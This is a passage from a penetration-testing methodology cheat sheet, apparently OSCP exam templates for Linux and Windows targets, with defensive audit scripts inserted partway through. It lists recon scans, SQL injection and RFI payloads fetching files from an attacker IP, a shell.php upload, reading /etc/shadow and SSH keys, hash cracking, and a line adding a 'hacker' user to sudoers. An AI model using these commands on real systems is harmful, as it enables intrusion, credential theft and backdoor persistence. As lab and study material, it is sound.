
#### SQL-Injection

```
# Post
./sqlmap.py -r search-test.txt -p tfUPass

# Get
sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql

# Crawl
sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3
```

#### Sql-login-bypass

- Open Burp-suite
- Make and intercept a request
- Send to intruder
- Cluster attack.
- Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
- Attack
- Check for response length variation


### Password brute force - last resort

```
cewl
```

### Port 443 - HTTPS

Heartbleed:

```
# Heartbleed
sslscan INSERTIPADDRESS:443
```

## Vulnerability analysis

Now we have gathered information about the system. Next comes the part where we look for exploits, vulnerabilities and features.

### To try - List of possibilities

Add possible exploits here:


### Find sploits - Searchsploit and google

Where there are many exploits for a piece of software, use Google. It will automatically sort them by popularity.

```
site:exploit-db.com apache 2.4.7

# Remove dos-exploits
searchsploit Apache 2.4.7 | grep -v '/dos/'
searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"

# Only search the title (exclude the path), add the -t
searchsploit -t Apache | grep -v '/dos/'
```



----------------------------------------------------------------------------

'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''

-----------------------------------------------------------------------------



## Privilege escalation

Now we start the whole enumeration process over again.

- Kernel exploits
- Programs running as root
- Installed software
- Weak/reused/plaintext passwords
- Inside service
- Suid misconfiguration
- World writable scripts invoked by root
- Unmounted filesystems

Less likely

- Private ssh keys
- Bad path configuration
- Cronjobs


### To-try list

Here you will add all possible leads. What to try.
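The checklist above names the conditions to look for. As an added example (Python 3, not part of the xapax/oscp templates or of reconscan.py), here is the same list approached from the hardening side for three of its items: setuid binaries that are not on an expected baseline, files referenced from cron entries that any local user can modify before root runs them, and nothing more than reading file metadata to find either. It constructs its own fixture tree in a temporary directory, so it runs offline; DEFAULT_SETUID_ALLOWLIST, the crontab text and the fixture paths are all constructed for the example, and an operator would replace the allowlist with the baseline of their own distribution.

```python
# Added example: read-only audit for two privilege-escalation checklist items,
# unexpected setuid files and world-writable cron targets, run over a
# constructed filesystem tree.
import os
import re
import stat
import tempfile

# Constructed, deliberately short baseline of setuid binaries a host is expected
# to ship (an assumption for this example, not a complete reference list).
DEFAULT_SETUID_ALLOWLIST = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/bin/su", "/bin/ping"}

# An absolute path token in a cron command: a "/" not glued to a preceding word, "*" or "."
# (so the "*/5" schedule field is not a path), followed by a name and running to
# whitespace or a shell operator.
ABS_PATH = re.compile(r"(?<![\w.*-])/[A-Za-z_][^\s;&|>]*")


def is_world_writable_file(path):
    """True for a regular file (symlinks and devices excluded) whose 'other' write bit is set."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)


def find_unexpected_setuid(root, allowlist=DEFAULT_SETUID_ALLOWLIST):
    """Setuid regular files under root whose path (relative to root) is not on the allowlist."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                rel = "/" + os.path.relpath(full, root)
                if rel not in allowlist:
                    found.append(rel)
    return sorted(found)


def cron_command_paths(crontab_text):
    """Absolute paths referenced by cron entries (system or user crontab format)."""
    paths = set()
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank lines, comments and VAR=value lines carry no command
        paths.update(ABS_PATH.findall(line))
    return sorted(paths)


def find_writable_cron_targets(crontab_text, root="/"):
    """Cron-referenced files under root that any local user could modify before cron runs them."""
    return [p for p in cron_command_paths(crontab_text)
            if is_world_writable_file(os.path.join(root, p.lstrip("/")))]


def audit(root, crontab_text):
    """Run both checks against a filesystem tree rooted at root."""
    return {
        "unexpected_setuid": find_unexpected_setuid(root),
        "writable_cron_targets": find_writable_cron_targets(crontab_text, root),
    }


def build_demo_tree(base):
    """Constructed fixture, not a real host: a fake root with one allowlisted and one stray
    setuid file, plus a cron entry whose script is world-writable. Returns the crontab text."""
    def touch(rel, mode):
        full = os.path.join(base, rel.lstrip("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(full, mode)
    touch("/usr/bin/passwd", 0o4755)          # expected setuid
    touch("/opt/backup/helper", 0o4755)       # unexpected setuid
    touch("/usr/local/bin/backup.sh", 0o777)  # world-writable, run by root from cron
    touch("/usr/local/bin/rotate.sh", 0o755)  # owner-writable only: fine
    return ("SHELL=/bin/sh\n"
            "# m h dom mon dow user command\n"
            "*/5 * * * * root /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1\n"
            "0 3 * * * root /usr/local/bin/rotate.sh\n")


def run_demo():
    """Build the fixture in a fresh temporary directory and audit it."""
    root = tempfile.mkdtemp(prefix="privesc-audit-")
    return audit(root, build_demo_tree(root))


if __name__ == "__main__":
    for check, hits in run_demo().items():
        print("%s: %s" % (check, ", ".join(hits) or "none"))
```

On a real host the same functions run with root="/" and the system crontab files read from /etc/crontab and /etc/cron.d; a hit in either list is a finding to fix (strip the setuid bit or tighten the script's permissions) and a cheap thing to alert on from a periodic integrity check.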
449 | 
450 | 
451 | ### Useful commands
452 | 
453 | ```
454 | # Spawning shell
455 | python -c 'import pty; pty.spawn("/bin/sh")'
456 | 
457 | # Access to more binaries
458 | export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
459 | 
460 | # Set up webserver
461 | cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080
462 | 
463 | # Download all files
464 | wget http://192.168.1.101:8080/ -r; mv 192.168.1.101:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check
465 | 
466 | ./LinEnum.sh -t -k password -r LinEnum.txt
467 | python linprivchecker.py extended
468 | ./unix-privesc-check standard
469 | 
470 | 
471 | # Writable directories
472 | /tmp
473 | /var/tmp
474 | 
475 | 
476 | # Add user to sudoers
477 | echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
478 | ```
479 | 
480 | 
481 | ### Basic info
482 | 
483 | - OS:
484 | - Version:
485 | - Kernel version:
486 | - Architecture:
487 | - Current user:
488 | 
489 | **Devtools:**
490 | - GCC:
491 | - NC:
492 | - WGET:
493 | 
494 | **Users with login:**
495 | 
496 | ```
497 | uname -a
498 | env
499 | id
500 | cat /proc/version
501 | cat /etc/issue
502 | cat /etc/passwd
503 | cat /etc/group
504 | cat /etc/shadow
505 | cat /etc/hosts
506 | 
507 | # Users with login
508 | grep -vE "nologin" /etc/passwd
509 | 
510 | # Priv Enumeration Scripts
511 | 
512 | 
513 | upload /unix-privesc-check
514 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./
515 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./
516 | 
517 | python linprivchecker.py extended
518 | ./LinEnum.sh -t -k password
519 | unix-privesc-check
520 | ```
521 | 
522 | ### Kernel exploits
523 | 
524 | ```
525 | site:exploit-db.com kernel version
526 | 
527 | perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6
528 | 
529 | python linprivchecker.py extended
530 | ```
531 | 
532 | ### Programs running as root
533 | 
534 | Look for a webserver, mysql or anything else like that.
535 | 
536 | ```
537 | # Metasploit
538 | ps
539 | 
540 | # Linux
541 | ps aux
542 | ```
543 | 
544 | ### Installed software
545 | 
546 | ```
547 | /usr/local/
548 | /usr/local/src
549 | /usr/local/bin
550 | /opt/
551 | /home
552 | /var/
553 | /usr/src/
554 | 
555 | # Debian
556 | dpkg -l
557 | 
558 | # CentOS, openSUSE, Fedora, RHEL
559 | rpm -qa
560 | 
561 | # OpenBSD, FreeBSD
562 | pkg_info
563 | ```
564 | 
565 | 
566 | ### Weak/reused/plaintext passwords
567 | 
568 | - Check database config-file
569 | - Check databases
570 | - Check weak passwords
571 | 
572 | ```
573 | username:username
574 | username:username1
575 | username:root
576 | username:admin
577 | username:qwerty
578 | username:password
579 | ```
580 | 
581 | - Check plaintext
582 | 
583 | ```
584 | ./LinEnum.sh -t -k password
585 | ```
586 | 
587 | ### Inside service
588 | 
589 | ```
590 | # Linux
591 | netstat -anlp
592 | netstat -ano
593 | ```
594 | 
595 | ### Suid misconfiguration
596 | 
597 | Binaries with the suid bit can be run by anyone, but when they run they run as root!
598 | 
599 | Example programs:
600 | 
601 | ```
602 | nmap
603 | vim
604 | nano
605 | ```
606 | 
607 | ```
608 | find / -perm -u=s -type f 2>/dev/null
609 | ```
610 | 
611 | 
612 | ### Unmounted filesystems
613 | 
614 | Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again.
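As an added example (not part of the original template or the repository's own scripts), here is a small POSIX-shell audit that turns two items of the checklist above into repeatable checks: SUID binaries that are not on a known-good baseline (the `find / -perm` hunt in the Suid section) and cron jobs whose command is a world-writable file (the "World writable scripts invoked by root" item, which the Cronjob section below covers by hand). The scanned root, the baseline and the crontab contents are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original repository. Two privesc checklist
# items as repeatable audits. Everything created under $tmp in demo() is
# constructed sample data, not a real system.

# Print SUID files under root dir $1 that are not listed in baseline file $2
# (one path per line, written relative to the scanned root).
suid_not_in_baseline() {
    root=$1; baseline=$2
    find "$root" -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        rel=${f#"$root"}
        grep -qxF -- "$rel" "$baseline" || echo "$rel"
    done | sort
}

# Read a system-format crontab ($1: min hour dom mon dow user command ...) and
# print "user command" for every job whose command file is world-writable.
# Comments, blank lines and VAR=value lines are skipped.
cron_world_writable() {
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*=)' "$1" |
    while read -r min hour dom mon dow user cmd rest; do
        [ -n "$cmd" ] || continue
        # -perm -0002: the "other write" bit is set (e.g. mode 666 or 777)
        if [ -n "$(find "$cmd" -prune -perm -0002 2>/dev/null)" ]; then
            echo "$user $cmd"
        fi
    done
}

# Build a constructed mini filesystem and run both checks against it.
# Expected: /tmp/backup is the SUID file outside the baseline, cleanup.sh is
# the world-writable cron target; passwd, sudo and rotate.sh are not reported.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/root/usr/bin" "$tmp/root/tmp"
    : > "$tmp/root/usr/bin/passwd"
    : > "$tmp/root/usr/bin/sudo"
    : > "$tmp/root/tmp/backup"
    chmod 4755 "$tmp/root/usr/bin/passwd" "$tmp/root/usr/bin/sudo" "$tmp/root/tmp/backup"
    printf '/usr/bin/passwd\n/usr/bin/sudo\n' > "$tmp/baseline.txt"

    : > "$tmp/root/tmp/cleanup.sh"; chmod 0777 "$tmp/root/tmp/cleanup.sh"
    : > "$tmp/root/tmp/rotate.sh";  chmod 0755 "$tmp/root/tmp/rotate.sh"
    cat > "$tmp/crontab" <<EOF
SHELL=/bin/sh
# m h dom mon dow user command
*/5 * * * *   root $tmp/root/tmp/cleanup.sh --quiet
0   2 * * *   root $tmp/root/tmp/rotate.sh
EOF

    echo "== SUID files not in baseline =="
    suid_not_in_baseline "$tmp/root" "$tmp/baseline.txt"
    echo "== cron jobs whose command is world-writable =="
    cron_world_writable "$tmp/crontab"
    rm -rf "$tmp"
}

demo
```

On a real host, point `suid_not_in_baseline` at `/` with a baseline taken from a clean install of the same distribution, and feed `cron_world_writable` the files the Cronjob section lists (`/etc/crontab`, `/etc/cron.d/*`).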
615 | 
616 | ```
617 | mount -l
618 | ```
619 | 
620 | ### Cronjob
621 | 
622 | Look for anything that is owned by a privileged user but writable by you.
623 | 
624 | ```
625 | crontab -l
626 | ls -alh /var/spool/cron
627 | ls -al /etc/ | grep cron
628 | ls -al /etc/cron*
629 | cat /etc/cron*
630 | cat /etc/at.allow
631 | cat /etc/at.deny
632 | cat /etc/cron.allow
633 | cat /etc/cron.deny
634 | cat /etc/crontab
635 | cat /etc/anacrontab
636 | cat /var/spool/cron/crontabs/root
637 | ```
638 | 
639 | ### SSH Keys
640 | 
641 | Check all home directories.
642 | 
643 | ```
644 | cat ~/.ssh/authorized_keys
645 | cat ~/.ssh/identity.pub
646 | cat ~/.ssh/identity
647 | cat ~/.ssh/id_rsa.pub
648 | cat ~/.ssh/id_rsa
649 | cat ~/.ssh/id_dsa.pub
650 | cat ~/.ssh/id_dsa
651 | cat /etc/ssh/ssh_config
652 | cat /etc/ssh/sshd_config
653 | cat /etc/ssh/ssh_host_dsa_key.pub
654 | cat /etc/ssh/ssh_host_dsa_key
655 | cat /etc/ssh/ssh_host_rsa_key.pub
656 | cat /etc/ssh/ssh_host_rsa_key
657 | cat /etc/ssh/ssh_host_key.pub
658 | cat /etc/ssh/ssh_host_key
659 | ```
660 | 
661 | 
662 | ### Bad path configuration
663 | 
664 | Requires user interaction.
665 | 
666 | 
667 | 
668 | 
669 | 
670 | ------------------------------------------------------------------------
671 | 
672 | 
673 | 
674 | 
675 | ----------------------------- LOOT LOOT LOOT LOOT ----------------------
676 | 
677 | 
678 | 
679 | 
680 | ------------------------------------------------------------------------
681 | 
682 | 
683 | ## Loot
684 | 
685 | **Checklist**
686 | 
687 | - Proof:
688 | - Network secret:
689 | - Passwords and hashes:
690 | - Dualhomed:
691 | - Tcpdump:
692 | - Interesting files:
693 | - Databases:
694 | - SSH-keys:
695 | - Browser:
696 | - Mail:
697 | 
698 | 
699 | ### Proof
700 | 
701 | ```
702 | /root/proof.txt
703 | ```
704 | 
705 | ### Network secret
706 | 
707 | ```
708 | /root/network-secret.txt
709 | ```
710 | 
711 | ### Passwords and hashes
712 | 
713 | ```
714 | cat /etc/passwd
715 | cat /etc/shadow
716 | 
717 | unshadow passwd shadow > unshadowed.txt
718 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
719 | ```
720 | 
721 | ### Dualhomed
722 | 
723 | ```
724 | ifconfig
725 | ifconfig -a
726 | arp -a
727 | ```
728 | 
729 | ### Tcpdump
730 | 
731 | ```
732 | tcpdump -i any -s0 -w capture.pcap
733 | tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
734 | tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
735 | ```
736 | 
737 | ### Interesting files
738 | 
739 | ```
740 | # Meterpreter
741 | search -f *.txt
742 | search -f *.zip
743 | search -f *.doc
744 | search -f *.xls
745 | search -f config*
746 | search -f *.rar
747 | search -f *.docx
748 | search -f *.sql
749 | 
750 | .ssh:
751 | .bash_history
752 | ```
753 | 
754 | ### Databases
755 | 
756 | ### SSH-Keys
757 | 
758 | ### Browser
759 | 
760 | ### Mail
761 | 
762 | ```
763 | /var/mail
764 | /var/spool/mail
765 | ```
766 | 
767 | ### GUI
768 | If there is a GUI we want to check out the browser.
769 | 
770 | ```
771 | echo $DESKTOP_SESSION
772 | echo $XDG_CURRENT_DESKTOP
773 | echo $GDMSESSION
774 | ```
775 | 
776 | ## How to replicate:
777 | 
--------------------------------------------------------------------------------
/templates/windows-template.md:
--------------------------------------------------------------------------------
1 | ## Info-sheet
2 | 
3 | 
4 | - DNS-Domain name:
5 | - Host name:
6 | - OS:
7 | - Server:
8 | - Workgroup:
9 | - Windows domain:
10 | - Services and ports:
11 | 
12 | INSERTTCPSCAN
13 | 
14 | 
15 | ## Recon
16 | 
17 | ```
18 | # Always start with a stealthy scan to avoid closing ports.
19 | 
20 | # Syn-scan
21 | nmap -sS INSERTIPADDRESS
22 | 
23 | # Service-version, default scripts, OS:
24 | nmap INSERTIPADDRESS -sV -sC -O
25 | 
26 | # Scan all ports, might take a while.
27 | nmap INSERTIPADDRESS -p-
28 | 
29 | # Scan for UDP
30 | nmap INSERTIPADDRESS -sU
31 | unicornscan -mU -v -I INSERTIPADDRESS
32 | 
33 | # Connect to udp if one is open
34 | nc -u INSERTIPADDRESS 48772
35 | 
36 | # Monster scan
37 | nmap INSERTIPADDRESS -p- -A -T4 -sC
38 | ```
39 | 
40 | 
41 | ### Port 21 - FTP
42 | 
43 | - Name:
44 | - Version:
45 | - Anonymous login:
46 | 
47 | INSERTFTPTEST
48 | 
49 | ```
50 | nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
51 | ```
52 | 
53 | ### Port 22 - SSH
54 | 
55 | - Name:
56 | - Version:
57 | - Protocol:
58 | - RSA-key-fingerprint:
59 | - Takes-password:
60 | If you have usernames, test login with username:username
61 | 
62 | INSERTSSHCONNECT
63 | 
64 | 
65 | ### Port 25
66 | 
67 | - Name:
68 | - Version:
69 | - VRFY:
70 | - EXPN:
71 | 
72 | INSERTSMTPCONNECT
73 | 
74 | ```
75 | nc -nvv INSERTIPADDRESS 25
76 | HELO foo
77 | 
78 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS
79 | ```
80 | 
81 | ### Port 110 - Pop3
82 | 
83 | - Name:
84 | - Version:
85 | 
86 | INSERTPOP3CONNECT
87 | 
88 | ### Port 135 - MSRPC
89 | 
90 | Some versions are vulnerable.
91 | 
92 | ```
93 | nmap INSERTIPADDRESS --script=msrpc-enum
94 | ```
95 | 
96 | Exploit:
97 | 
98 | ```
99 | msf > use exploit/windows/dcerpc/ms03_026_dcom
100 | ```
101 | 
102 | ### Port 139/445 - SMB
103 | 
104 | - Name:
105 | - Version:
106 | - Domain/workgroup name:
107 | - Domain-sid:
108 | - Allows unauthenticated login:
109 | 
110 | 
111 | ```
112 | nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse INSERTIPADDRESS -p 445
113 | 
114 | enum4linux -a INSERTIPADDRESS
115 | 
116 | rpcclient -U "" INSERTIPADDRESS
117 | srvinfo
118 | enumdomusers
119 | getdompwinfo
120 | querydominfo
121 | netshareenum
122 | netshareenumall
123 | 
124 | smbclient -L INSERTIPADDRESS
125 | smbclient //INSERTIPADDRESS/tmp
126 | smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
127 | smbclient //INSERTIPADDRESS/ipc$ -U john
128 | smbclient //INSERTIPADDRESS/admin$ -U john
129 | 
130 | # Log in with shell:
131 | winexe -U username //INSERTIPADDRESS "cmd.exe" --system
132 | 
133 | ```
134 | 
135 | ### Port 161/162 UDP - SNMP
136 | 
137 | 
138 | ```
139 | nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS
140 | snmp-check -t INSERTIPADDRESS -c public
141 | ```
142 | 
143 | ```
144 | # Common community strings
145 | public
146 | private
147 | community
148 | ```
149 | 
150 | 
151 | 
152 | ### Port 554 - RTSP
153 | 
154 | 
155 | ### Port 1030/1032/1033/1038
156 | 
157 | Used by RPC to connect in a domain network. Usually nothing.
158 | 
159 | ### Port 1433 - MSSQL
160 | 
161 | - Version:
162 | 
163 | ```
164 | use auxiliary/scanner/mssql/mssql_ping
165 | 
166 | # Last option. Brute force.
167 | scanner/mssql/mssql_login
168 | 
169 | # Log in to mssql
170 | sqsh -S INSERTIPADDRESS -U sa
171 | 
172 | # Execute commands
173 | xp_cmdshell 'date'
174 | go
175 | ```
176 | 
177 | If you have credentials, look in Metasploit for other modules.
178 | 
179 | ### Port 1521 - Oracle
180 | 
181 | - Name:
182 | - Version:
183 | - Password protected:
184 | 
185 | ```
186 | tnscmd10g version -h INSERTIPADDRESS
187 | tnscmd10g status -h INSERTIPADDRESS
188 | ```
189 | 
190 | 
191 | ### Port 2100 - Oracle XML DB
192 | 
193 | Can be accessed through ftp.
194 | Some default passwords here: https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
195 | - Name:
196 | - Version:
197 | 
198 | Default logins:
199 | 
200 | ```
201 | sys:sys
202 | scott:tiger
203 | ```
204 | 
205 | ### Port 2049 - NFS
206 | 
207 | ```
208 | showmount -e INSERTIPADDRESS
209 | 
210 | # If you find anything you can mount it like this:
211 | 
212 | mount INSERTIPADDRESS:/ /tmp/NFS
213 | mount -t nfs INSERTIPADDRESS:/ /tmp/NFS
214 | ```
215 | 
216 | ### Port 3306 - MySQL
217 | 
218 | - Name:
219 | - Version:
220 | 
221 | ```
222 | mysql --host=INSERTIPADDRESS -u root -p
223 | 
224 | nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306
225 | ```
226 | 
227 | ### Port 3339 - Oracle web interface
228 | 
229 | - Basic info about web service (apache, nginx, IIS)
230 | - Server:
231 | - Scripting language:
232 | - Apache Modules:
233 | - IP-address:
234 | - Domain-name address:
235 | 
236 | ### Port 3389 - Remote desktop
237 | 
238 | Test logging in to see what OS is running.
239 | 
240 | ```
241 | rdesktop -u guest -p guest INSERTIPADDRESS -g 94%
242 | 
243 | # Brute force
244 | ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
245 | ```
246 | 
247 | 
248 | ### Port 80
249 | 
250 | - Server:
251 | - Scripting language:
252 | - Apache Modules:
253 | - Domain-name address:
254 | 
255 | INSERTCURLHEADER
256 | 
257 | 
258 | - Web application
259 | - Name:
260 | - Version:
261 | 
262 | ```
263 | # Nikto
264 | nikto -h http://INSERTIPADDRESS
265 | 
266 | # Nikto with squid proxy
267 | nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444
268 | 
269 | # Get header
270 | curl -i INSERTIPADDRESS
271 | 
272 | # Get everything
273 | curl -i -L INSERTIPADDRESS
274 | 
275 | # Check if it is possible to upload using put
276 | curl -v -X OPTIONS http://INSERTIPADDRESS/
277 | curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php
278 | 
279 | # Directory traversal fuzzing
280 | dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix
281 | ```
282 | 
283 | 
284 | #### Nikto scan
285 | 
286 | 
287 | INSERTNIKTOSCAN
288 | 
289 | 
290 | 
291 | #### Url brute force
292 | 
293 | 
294 | 
295 | ```
296 | # Dirb
297 | dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt
298 | 
299 | # Gobuster - remove irrelevant response codes from -s (403 for example)
300 | gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
301 | ```
302 | 
303 | INSERTDIRBSCAN
304 | 
305 | 
306 | #### Default/Weak login
307 | 
308 | Google the documentation for default passwords and test them:
309 | 
310 | ```
311 | site:webapplication.com password
312 | ```
313 | 
314 | ```
315 | admin admin
316 | admin password
317 | admin
318 | admin nameofservice
319 | root root
320 | root admin
321 | root password
322 | root nameofservice
323 | password
324 | admin
325 | username
326 | nameofservice
327 | ```
328 | 
329 | #### LFI/RFI
330 | 
331 | ```
332 | # Kadimus
333 | /root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=
334 | 
335 | 
336 | # Bypass execution
337 | http://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index
338 | base64 -d savefile.php
339 | 
340 | # Bypass extension
341 | http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00
342 | http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt?
343 | ```
344 | 
345 | 
346 | #### SQL-Injection
347 | 
348 | ```
349 | # Post
350 | ./sqlmap.py -r search-test.txt -p tfUPass
351 | 
352 | # Get
353 | sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql
354 | 
355 | # Crawl
356 | sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3
357 | ```
358 | 
359 | #### Sql-login-bypass
360 | 
361 | 
362 | - Open Burp-suite
363 | - Make and intercept request
364 | - Send to intruder
365 | - Cluster attack
366 | - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
367 | - Attack
368 | - Check for response length variation
369 | 
370 | ### Password brute force - last resort
371 | 
372 | ```
373 | cewl
374 | ```
375 | 
376 | ### Port 443 - HTTPS
377 | 
378 | Heartbleed:
379 | 
380 | ```
381 | sslscan INSERTIPADDRESS:443
382 | ```
383 | 
384 | ## Vulnerability analysis
385 | 
386 | Now that we have gathered information about the system, the next step is to look for exploits, vulnerabilities and interesting features.
387 | 
388 | ### To try - List of possibilities
389 | Add possible exploits here:
390 | 
391 | 
392 | ### Find sploits - Searchsploit and google
393 | 
394 | When there are many exploits for a piece of software, use Google; it sorts the results by popularity.
395 | 
396 | ```
397 | site:exploit-db.com apache 2.4.7
398 | 
399 | # Remove dos-exploits
400 | 
401 | searchsploit Apache 2.4.7 | grep -v '/dos/'
402 | searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"
403 | 
404 | # Only search the title (exclude the path), add the -t
405 | searchsploit -t Apache | grep -v '/dos/'
406 | ```
407 | 
408 | 
409 | 
410 | ----------------------------------------------------------------------------
411 | 
412 | 
413 | 
414 | '''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''
415 | 
416 | 
417 | 
418 | -----------------------------------------------------------------------------
419 | 
420 | 
421 | ## Privilege escalation
422 | 
423 | Now we start the whole enumeration-process over again. This is a checklist. You need to check off every single one, in this order.
424 | 
425 | - Kernel exploits
426 | - Cleartext password
427 | - Reconfigure service parameters
428 | - Inside service
429 | - Program running as root
430 | - Installed software
431 | - Scheduled tasks
432 | - Weak passwords
433 | 
434 | 
435 | 
436 | ### To-try list
437 | Here you will add all possible leads. What to try.
438 | 
439 | 
440 | ### Basic info
441 | 
442 | - OS:
443 | - Version:
444 | - Architecture:
445 | - Current user:
446 | - Hotfixes:
447 | - Antivirus:
448 | 
449 | **Users:**
450 | 
451 | **Localgroups:**
452 | 
453 | ```
454 | systeminfo
455 | set
456 | hostname
457 | net users
458 | net user user1
459 | net localgroup
460 | accesschk.exe -uwcqv "Authenticated Users" *
461 | 
462 | netsh firewall show state
463 | netsh firewall show config
464 | 
465 | # Set path
466 | set PATH=%PATH%;C:\xampp\php
467 | ```
468 | 
469 | 
470 | ### Kernel exploits
471 | 
472 | 
473 | ```
474 | # Look for hotfixes
475 | systeminfo
476 | 
477 | wmic qfe get Caption,Description,HotFixID,InstalledOn
478 | 
479 | # Search for exploits
480 | site:exploit-db.com windows XX XX
481 | ```
482 | 
483 | 
484 | ### Cleartext passwords
485 | 
486 | ```
487 | # Windows autologin
488 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
489 | 
490 | # VNC
491 | reg query "HKCU\Software\ORL\WinVNC3\Password"
492 | 
493 | # SNMP Parameters
494 | reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
495 | 
496 | # Putty
497 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
498 | 
499 | # Search for password in registry
500 | reg query HKLM /f password /t REG_SZ /s
501 | reg query HKCU /f password /t REG_SZ /s
502 | ```
503 | 
504 | 
505 | ### Reconfigure service parameters
506 | 
507 | - Unquoted service paths
508 | 
509 | Check the book for instructions.
510 | 
511 | - Weak service permissions
512 | 
513 | Check the book for instructions.
514 | 
515 | ### Inside service
516 | 
517 | Check netstat to see which ports are open from the outside and from the inside. Look for ports only available on the inside.
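The "Inside service" step of both templates boils down to one question: which listeners are bound only to a loopback address? The following POSIX-shell helper is an added example (not from the original template or repository) that answers it from saved `netstat` output; it locates the local-address field by its shape, so the same function handles the Linux `netstat -anlp` layout from the Linux template and the Windows `netstat -ano` layout used here. Both sample outputs are constructed.

```shell
#!/bin/sh
# Added example, not from the original repository. List listening sockets
# bound only to a loopback address in saved netstat output, i.e. services
# reachable from inside the host but not from the network. The sample
# netstat excerpts below are constructed, not captured from a real system.

# Reads netstat output on stdin, prints "proto port address" per loopback listener.
loopback_listeners() {
    awk '
    /LISTEN/ {
        for (i = 1; i <= NF; i++) {
            # IPv4 "a.b.c.d:port", or IPv6 "::1:port" (Linux) / "[::1]:port" (Windows)
            if ($i ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+:[0-9]+$/ || $i ~ /^\[?[0-9a-fA-F:]+\]?:[0-9]+$/) {
                n = split($i, part, ":")
                port = part[n]
                addr = substr($i, 1, length($i) - length(port) - 1)
                gsub(/\[|\]/, "", addr)
                if (addr ~ /^127\./ || addr == "::1") {
                    print tolower($1), port, addr
                }
                break   # the first address-shaped field is the local address
            }
        }
    }'
}

# Constructed Linux "netstat -anlp" excerpt.
sample_linux() {
    cat <<'EOF'
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1234/mysqld
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      800/sshd
tcp6       0      0 ::1:631                 :::*                    LISTEN      900/cupsd
udp        0      0 0.0.0.0:68              0.0.0.0:*                           600/dhclient
EOF
}

# Constructed Windows "netstat -ano" excerpt.
sample_windows() {
    cat <<'EOF'
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
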